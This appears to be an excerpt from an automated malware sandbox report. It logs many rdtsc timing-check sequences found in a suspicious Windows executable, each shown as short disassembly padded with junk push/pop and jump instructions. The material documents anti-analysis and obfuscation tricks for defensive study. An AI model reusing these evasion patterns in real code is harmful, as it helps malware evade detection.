Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C52D second address: D2C54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D34597Fh 0x00000009 ja 00007F0D5D345976h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C54B second address: D2C551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C551 second address: D2C555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C698 second address: D2C6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C6A0 second address: D2C6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F0D5D345978h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C6B2 second address: D2C6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C6C5 second address: D2C6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C6CC second address: D2C6D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C983 second address: D2C9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F0D5D34597Fh 0x0000001c jmp 00007F0D5D345985h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C9C2 second address: D2C9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C9C8 second address: D2C9CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CB2C second address: D2CB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CB30 second address: D2CB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0D5D34597Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CCA6 second address: D2CCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CCAA second address: D2CCFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F0D5D345981h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jnp 00007F0D5D345976h 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F0D5D345983h 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CCFA second address: D2CD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2CD00 second address: D2CD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D34597Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D32FDE second address: D32FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D32FE2 second address: D32FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D32FE6 second address: D32FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D5D4BD01Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D32FFC second address: D3300E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F0D5D345976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3300E second address: D33014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D33014 second address: D33018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31D3E second address: D31D7A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D5D4BD031h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0D5D4BD025h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31D7A second address: D31D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D34597Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31D8D second address: D31DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D5D4BD01Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D321C0 second address: D321DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0D5D345976h 0x00000009 jne 00007F0D5D345976h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D321DB second address: D321DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D321DF second address: D321E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3233B second address: D32353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0D5D4BD01Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D324B3 second address: D324B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D32E9D second address: D32EBA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0D5D4BD024h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31771 second address: D3177C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3177C second address: D31780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31780 second address: D31786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D31786 second address: D3179A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD020h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3BAC8 second address: D3BAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0D5D345976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF40C0 second address: CF40C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF43F7 second address: CF43FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4494 second address: CF44AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF44AD second address: CF44D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F0D5D34597Eh 0x0000000d jl 00007F0D5D345978h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a jne 00007F0D5D345976h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF44D0 second address: CF44FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F0D5D4BD024h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF44FA second address: CF44FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF46B2 second address: CF46B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF46B6 second address: CF46DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0D5D345987h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF46DA second address: CF46DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF49E8 second address: CF49EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4D6C second address: CF4D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD020h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4D80 second address: CF4D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0D5D345976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4D8B second address: CF4DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D5D4BD01Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4DA1 second address: CF4DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sbb ecx, 70019775h 0x00000010 push 0000001Eh 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0D5D345978h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D3636h] 0x00000032 nop 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4DF1 second address: CF4DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4DF5 second address: CF4DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4DF9 second address: CF4E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0D5D4BD01Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D5D4BD024h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF50FC second address: CF5102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5102 second address: CF5106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5236 second address: CF523C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF523C second address: CF5254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5254 second address: CDAEDC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0D5D345976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F0D5D345978h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F0D5D345989h 0x00000019 call dword ptr [ebp+122D276Eh] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F0D5D345976h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3ACAB second address: D3ACC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D5D4BD023h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B060 second address: D3B078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push edi 0x00000008 jmp 00007F0D5D34597Fh 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B229 second address: D3B23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F0D5D4BD060h 0x0000000b jl 00007F0D5D4BD022h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B23C second address: D3B242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B242 second address: D3B261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0D5D4BD029h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B3AE second address: D3B3BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007F0D5D345976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B518 second address: D3B51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B51E second address: D3B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B526 second address: D3B543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D5D4BD016h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f je 00007F0D5D4BD022h 0x00000015 js 00007F0D5D4BD016h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3B543 second address: D3B572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D345988h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D5D345981h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3E193 second address: D3E1AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D5D4BD022h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3E1AC second address: D3E1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F0D5D34597Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3DC2B second address: D3DC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D5D4BD016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3DC35 second address: D3DC3F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D5D345976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3DC3F second address: D3DC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD01Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D3DC4D second address: D3DC9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 jmp 00007F0D5D345988h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D5D345984h 0x00000015 jne 00007F0D5D345976h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4124B second address: D41266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D4BD025h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D41266 second address: D4126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB5A69 second address: CB5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D40BA9 second address: D40BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D40BAD second address: D40BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D40BB6 second address: D40BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 jbe 00007F0D5D345980h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D40E64 second address: D40E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4608B second address: D460A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D460A1 second address: D460AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007F0D5D4BD016h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4593E second address: D45944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45A7F second address: D45A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45A83 second address: D45AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 ja 00007F0D5D345976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45AA6 second address: D45AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0D5D4BD016h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45AB3 second address: D45ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45ABC second address: D45AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45BF6 second address: D45BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D45BFA second address: D45BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
